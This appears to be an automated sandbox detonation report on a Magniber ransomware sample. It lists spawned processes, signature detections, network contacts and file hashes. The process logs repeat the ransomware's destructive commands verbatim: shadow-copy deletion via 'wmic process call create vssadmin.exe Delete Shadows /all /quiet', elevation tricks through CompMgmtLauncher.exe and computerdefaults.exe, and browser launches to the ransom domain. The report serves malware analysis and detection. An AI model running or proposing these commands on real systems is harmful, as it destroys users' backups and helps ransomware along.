C:\Windows\system32\cmd.exe

cmd /c "start http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec^&2^&41210360^&72^&351^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec&2&41210360&72&351&12

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2356 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 14c430d846009c5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 14c430d846009c5066qbvpseec.gosmark.space udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/1116-0-0x0000000000570000-0x0000000000575000-memory.dmp

memory/2116-15-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/2116-14-0x0000000002480000-0x0000000002481000-memory.dmp

memory/2116-13-0x0000000002460000-0x0000000002461000-memory.dmp

memory/2116-12-0x0000000002450000-0x0000000002451000-memory.dmp

memory/2116-11-0x0000000002410000-0x0000000002411000-memory.dmp

memory/2116-10-0x0000000001D40000-0x0000000001D41000-memory.dmp

memory/2116-9-0x0000000001D30000-0x0000000001D31000-memory.dmp

memory/2116-8-0x0000000001D20000-0x0000000001D21000-memory.dmp

memory/2116-7-0x00000000002B0000-0x00000000002B1000-memory.dmp

memory/2116-6-0x00000000002A0000-0x00000000002A1000-memory.dmp

memory/2116-5-0x0000000000290000-0x0000000000291000-memory.dmp

memory/2116-4-0x0000000001DD0000-0x0000000002402000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 9d4de1b8ffcb1f89c7352821d0dd53f0
SHA1 98447a1b34b9aac7544613a2184a16188d6db7a2
SHA256 c9374a0c1df5c2f8f16a7a53afc2063692ba548bde07417858b27bf743437674
SHA512 102aaf1f7e4bf31cdba1882467a57cac080a31a0f76725b38d646918070a59d5c3f72105d4648acde8f31e9b7d7d96fb94a8313840a4674aee4b2a2f9662a56c

C:\Users\Admin\AppData\Local\Temp\Cab1D25.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar1E03.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 27ff3f1f0d6a8b38e8173e6d0083b09a
SHA1 6ea8652ce4c41d14dc323d910c67692d5f3d0ab3
SHA256 0003c54b8abed07272ca799d92f1d691ebc0400aecbbece2ec3e1b416d719d54
SHA512 286be4a0bff61c597a3ffaf56444fed19fd08eb3f99a11ba50986e9ea7d1add125111b17b330d1416379e974f34f3d470f1893dc741a275bcbdda6a62ac75d3b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b50e8bfed9de97372b5af1479bedb8b1
SHA1 4df6c567010c3bdf8c546b6a1460b677e0410b80
SHA256 a17b155c65bc696b55903aa1071cb32ba4294849ac4e9bc01fee3c4719098684
SHA512 fc69c5bf71a1998218471a77a0d95d5be02ec1d0134ab7eec3eada77ec781277da4c77bcd07635f6e8b69a22a0a6baa9e8aaf2600358d71a92e3b31aec53757c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1975e4a084cadfc2b4297da65b7de1a0
SHA1 8548d70f9712ea8eefba7af32c014ad3ea078797
SHA256 c03930fc45fb4e118d9196acfe7b26bd6722f81ffb627f710d342e300ed0b3dd
SHA512 e4de896d3a44ca40c24fed8ac4a9f026e7f6dfee4f555e4e5a180b09d59740579c357828492d386bbcec4825b3780dcb95fe7607014bc9f94354c8f06b6a5e84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c31cd526472c4363246aea1b6e52cc39
SHA1 61c24acf0b6caa8e5375420f31baccd99b1b0456
SHA256 404e928088f886c79abacdeea0f59b24981b1925e1e0eebe7a70ff442fa1b889
SHA512 82d07f53dea27f9e829656d6cac3cc12d3bdb5b90ef15335612a31660b7c26b1ab390837a577253da92bbff7c9f4c2bff031ca6e2893d8c5118286f47c87777b

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d35259554142cc895be443deea951a9c
SHA1 6ca96b0389e1791eb8933313888bafd2193371c4
SHA256 2495aa77805f4bdc66bce19af53efeec5be0227e442b68aea37824593ccb8d72
SHA512 5108f96da6972ede55905c5a3351eb9536317eb12af30755ef0aa2bfab6d592947d0a452530bc3de43b87f4de4360302957dbb6a50e16a3cfcbecd93ebb246ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e7d4c16b81da2e777394722ba0f9bbdc
SHA1 2d4c407febfd7fb2b96a6c6e21062b8886b1a379
SHA256 d7271848e914171dd033034a0ad025f4c8e0f82a3ef17e5608a5b831ff209cd1
SHA512 9720419ebd3c7113cd9aa430daade2000f97772e6aa9346ae3feae860b2033caffd3e6740411248680c249519c84135fab5ed40a844d511a1395eb2ef34f41be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24b03167315b8f3bee88749581b33a4c
SHA1 a11190b6e4455cedab10cfee88115ad6531d0c57
SHA256 9120fda432beda0fd91b1f1171d7b952fa29ce633b03e95848eb5f90a02a42b3
SHA512 a673c4840388b9b31da41f291ff39be766155e2d080aa6f28aa21dd20f849b739577a5b09cf197a39c0a51c170043892b1a7fef522d48f56e93db8424e4146ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de65a9963300054ecd5ea99d36c89b8f
SHA1 2d81516f5345d9359c476ea5efee3574d1bbb5a7
SHA256 797c426a87fa5ddeb251eaf9fd712df53b43391aa9dae27b426650b254e14f97
SHA512 9d53156421472085e652d4157bd1afb6916fd20354e86b5da1364499366943a46eed114ab8a0ac895b7815b6893a60760b76112b8696f51fcc36a1cadc83ee06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c57eb90b39652058aadd15d92b8765bf
SHA1 2ac7cf812f94183c67727d9ac2084c52e7b4ef18
SHA256 a46b6b7430a65de53361ae98455f80ae7320f2ceab38639e6a8e6c883efca600
SHA512 ad456aca2fbc5cf73add6d1227320d4fd96f994defa4023decb21a9ceab3a998824bc617a367a00d9366acfa23377e897f025cd890908f5e13cbe146de99ae15

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa0e71944fa86bd96e73c0b91f29aba0
SHA1 a4a398d78e4b65f23ca2beb05ef477d3d556eeb1
SHA256 c8a9e2d40f4a8b138f76f817e11ee82f8fb0f9b4d4c9e8989cdbe788104155be
SHA512 c702010e1955d4c7216934f6f3f104ba46ea3d99c0456ae9849e8355ea95bf7f3ead5077e6653b5bd85c004156cc9c780203c902f2d16b7d8afe80ccb35847b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 73f6cd476df3bd650a22b2c0dd650bfd
SHA1 7fd3f424bdcefa362765cccb6d3ad1dd27abc1d9
SHA256 f5e50ab621cc4832a8f21940b3fa8c3c840dcc84b220be82818f442a8685bf7a
SHA512 3ea0e23e0a5926f24a32e3b919f80a76a28258c5daeb132f6e6f630dcb02ef90bda0c00cc10a0c05eb0217d4b6a11a27827d5c8fbb9f1adb0e57ed55875c47ac

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1904e847e1c37ef4e5c777e146294a96
SHA1 3025c2c7a81d171153283cfe1aa21105b919dc23
SHA256 f50942414a06cc4099e00b1689d09582b52c6af32c48dd24e49d5fca894358e3
SHA512 dcb576da981d0385f86ea7058de588d78aeaf7e8fb88cb5a3b1c2124cb0b80768fcd6200b688a5df77b6374890b84b499b35bed866cd49cd8754855b6224ebf8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b84931ccd2c636d209f0f31a45920117
SHA1 c837b1ee932f3ed367769af0269aa644fccc76b7
SHA256 907c13cde7f2b21f89b85a26f9939fad99c65ce3d3621863f825a8ac0c9df625
SHA512 cd81a936a50637ef1a91abc3135c4dcf7bd0f72e3324dd071aa117970de270e8ffe3fa78defdd0ba8449fd3c4b265a209d0c34f25eb35d90ec5a87dbb78c2b58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c27a05ccb6112115f6aad6ee64ef7c0
SHA1 6eab9b1b8b700ac9e2d084c345c67165fe5e1c3a
SHA256 734772e53dbd92951ab1cc444448e9ec28935194a7831b894fd9c04385b7103f
SHA512 be504bac9b8d06c97c1fb80a0a476fe18f3f6824d97906dcc6eb74f938376d46b9c7ff26e88308804d940ee8aca882f2e2f69e14dd94a02bf821ecc953126760

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-11 15:46

Reported

2024-12-12 09:06

Platform

win10v2004-20241007-en

Max time kernel

2s

Max time network

152s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1920 set thread context of 2996 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 1920 set thread context of 3068 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 1920 set thread context of 2684 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 1920 set thread context of 3428 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 1920 set thread context of 3556 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 1920 set thread context of 3768 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 1920 set thread context of 3860 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 1920 set thread context of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 4024 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 1920 set thread context of 4196 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 4152 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 1920 set thread context of 3968 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 232 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Opens file in notepad (likely ransom note)

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\System32\cmd.exe

cmd /c "start http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec^&2^&44436918^&80^&327^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec&2&44436918&80&327&2219041

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff4aae46f8,0x7fff4aae4708,0x7fff4aae4718

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

